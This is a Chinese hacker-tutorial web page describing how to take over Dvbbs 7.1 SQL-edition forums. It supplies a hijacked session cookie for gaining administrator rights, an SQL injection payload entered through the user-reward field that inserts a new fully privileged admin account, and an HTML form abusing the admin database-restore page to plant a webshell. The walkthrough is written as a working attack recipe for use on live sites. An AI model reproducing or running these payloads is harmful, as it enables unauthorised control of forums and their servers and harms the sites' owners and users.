首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

Dvbbs 7.1Sql版跳过死循环提权得Shell


http://www.gipsky.com/
dvbbs 7.1跳过死循环,按linzi的方法只能是有一个治理权限,而只是新手上路的等级

假如是sql版,就不好暴库,事实上似乎只需要抓取SESSION即可,不要登陆任何用户。

欺骗时不要关闭假死的那个ie



这个是死循环的SESSION:

ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDDPNAAIOCKGCJ



加入或替换到可以欺骗的浏览器的cookie栏。

List=list5 and 1=2=1&list5 and 1=1=1&list1 and 1=2=1&list1 and 1=1



=1&list3 and 1=2=1&list3 and 1=1=1; ASPSESSIONIDQCTRTQAC=HOPNBJLCKHGDD



PNAAIOCKGCJ



然后点任何板块

就能发现,你欺骗的用户和等级都是治理员了。



后台治理员可以通过用户奖励那里加入



test','127.0.0.1',5) ;insert into dv_admin (username,[password],flag,adduser)



values'jinsdb','4ac646c9e65a1769','1,2,3,4,5,6,7,8,9,10,11,12,13,



14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','jinsdb');--

dvbbs7.1 sql 后台得shell



<form action="<a href="http://127.0.0.1/bbs/admin/data.asp?act...t=Restore"" target=_blank>http://127.0.0.1/bbs/admin/data.asp?a ... t=Restore"</a> method="post">

<p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>

<p>要复制到的位置:<input name="backpath" type="text" size="80"></p>

<p><input type="submit" value="提交"></p>

</form>



似乎7.1的usercookies只是个幌子

根本没必要

去掉了也一样可以使用
<< 国内所有Mail安全漏洞 Visual C 编程窃取QQ密码 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号